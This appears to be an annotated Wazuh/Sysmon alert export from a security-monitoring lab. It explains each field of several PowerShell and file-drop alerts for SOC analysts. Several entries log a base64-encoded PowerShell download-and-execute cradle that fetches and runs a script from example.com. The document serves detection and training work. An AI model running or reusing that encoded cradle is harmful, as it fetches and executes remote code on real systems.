data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:03.522+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:03.522+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  67
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534283.1539568
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:01.2115486Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284199
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:01.067 ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} ProcessId: 15132 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1iubx32l.gko.ps1 CreationUtcTime: 2025-04-24 22:38:01.067 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:01.067
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd47-680a-610b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15132
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1iubx32l.gko.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:01.067
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:38:04.258+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:04.258+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534284.1542337
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26157
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Detailed File Share' is set to include 'Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  3.3,8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Detailed File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Detailed File Share"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:10.134+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:10.134+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  64
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534290.1545402
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:07.6419042Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284255
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:02.808 ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} ProcessId: 10844 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} ParentProcessId: 15132 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:02.808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd4a-680a-660b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd47-680a-610b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15132
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:10.136+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:10.136+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  68
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534290.1553473
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:07.8488294Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284256
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:07.834 ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} ProcessId: 10844 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wrzawqio.au1.ps1 CreationUtcTime: 2025-04-24 22:38:07.834 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:07.834
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd4a-680a-660b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wrzawqio.au1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:07.834
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:12.393+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:12.393+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  65
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534292.1556242
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:10.3560006Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284299
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

